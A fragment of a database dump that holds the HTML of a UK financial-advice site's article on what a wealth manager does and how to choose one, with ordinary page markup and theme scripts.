strategy.</p>&#13;\n<p> </p>&#13;\n<p><b>Basically everyone is different. So a wealth manager has to be adaptable to everyone’s needs.</b></p></section></div>&#13;\n<h2><b>So Who Is The Right Wealth Manager for You?</b></h2>&#13;\n<p>In order to find the answer, you need to ask a few questions. Not only of the wealth managers, but of yourself too. First and foremost, does your wealth manager need to be local? Here in the twenty first century, communications and technology have made the world a more convenient place and face to face business is less of a necessity.</p>&#13;\n<p><b>It doesn’t matter where your wealth manager is based if they are the right choice for you.</b></p>&#13;\n<p>Discuss the typical type of client with which the wealth manager usually deals. Are they a good match for you? What are your expectations? Do you think this particular wealth manager will meet them?</p>&#13;\n<p>Find out what the plans are at the wealth management company should something happen to your wealth manager. Is there a succession plan in place? You should feel comfortable that there are more people in the business to cover for holidays, sickness or should something unforeseen occur.</p>&#13;\n<p>Finally – and maybe most importantly – listen to your gut instinct. Do you actually like this person? Will you be comfortable talking to, meeting, and placing your trust in them in the future?</p>&#13;\n<p><b>So what does a wealth manager do? The answer is – many things. And a good wealth manager is someone with experience, knowledge and the ability to effectively manage your assets over time. Someone you can build a solid, comfortable and trusted relationship with for a brighter future. </b></p>&#13;\n<p><em>Yaz Hamir</em><b><br/></b></p>&#13;\n							</div>&#13;\n						<div class=\"meta-info\">&#13;\n				<div class=\"alignleft vcard\">&#13;\n					<span class=\"fn\">By <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span><a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><a href=\"../what-does-a-wealth-managerdo/\" title=\"Comment on What Does a Wealth Manager Do?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n									<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?u=http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/&amp;t=What%20Does%20a%20Wealth%20Manager%20Do?\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=What%20Does%20a%20Wealth%20Manager%20Do?%20http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/&amp;title=What%20Does%20a%20Wealth%20Manager%20Do?\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																									<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																				<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=What Does a Wealth Manager Do?&amp;body=http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n						&#13;\n												<div class=\"related-posts single-related-posts\">&#13;\n				<div class=\"title\"><h2>Related Posts</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div id=\"carousel\" class=\"es-carousel-wrapper\">&#13;\n					<div class=\"es-carousel\">&#13;\n						<ul><li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../seven-deadly-investment-sins/\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>The Seven Deadly Investment Sins</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../mortgage-strategic-alliance/\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>Mortgage Strategic Alliance</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../esmart-money-januaryfebruary-2014-issue/\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>eSmart Money January/February 2017 issue</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../how-much-money-can-i-get-pension/\">Permalink</a>&#13;\n														<a href=\"#\">Gallery</a>&#13;\n												<p>How much Money can I get out of my Pension?</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../pension-liberation-good-plan-or-bad-scam/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/07/scams.gif\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>Pension Liberation – Good plan or bad scam?</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/07/Our-Story.jpg\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../retirement-income-the-final-frontier/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/06/final-frontier.jpg\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>Retirement Income. The Final Frontier.</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n					<div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div>&#13;\n				</div>&#13;\n			</div>&#13;\n						&#13;\n												&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n<div id=\"respond\" class=\"section\">&#13;\n	<div>&#13;\n	<div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n	<div>&#13;\n&#13;\n	<div><p class=\"cancel-comment-reply\"><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../what-does-a-wealth-managerdo/\" style=\"display:none;\">Click here to cancel reply.</a></p></div>&#13;\n&#13;\n	&#13;\n	&#13;\n&#13;\n		&#13;\n		<div id=\"comment-input\">&#13;\n&#13;\n			&#13;\n&#13;\n			&#13;\n		&#13;\n			&#13;\n			&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-textarea\">&#13;\n			&#13;\n			&#13;\n		&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-submit\">&#13;\n		&#13;\n			<p/>&#13;\n			<input type=\"hidden\" name=\"comment_post_ID\" value=\"6593\" id=\"comment_post_ID\"/><p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"2f3f58fee3\"/></p>			&#13;\n		</div>&#13;\n&#13;\n		&#13;\n	&#13;\n&#13;\n		</div>&#13;\n	</div>&#13;\n</div>&#13;\n&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 31st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (4)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','What Does a Wealth Manager Do?','A wealth manager has a diverse job. Clients come to a wealth manager for assistance with anything from property, investments, pensions, trusts and insurance.','publish','closed','closed','','what-does-a-wealth-manager-do','','','2017-09-21 16:34:43','2017-09-21 16:34:43','',0,'http://www.equalitywalk.org.uk/what-does-a-wealth-manager-do',0,'page','',0),(118,1,'2017-09-21 16:34:43','2017-09-21 16:34:43','<body class=\"single single-post postid-8314 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" 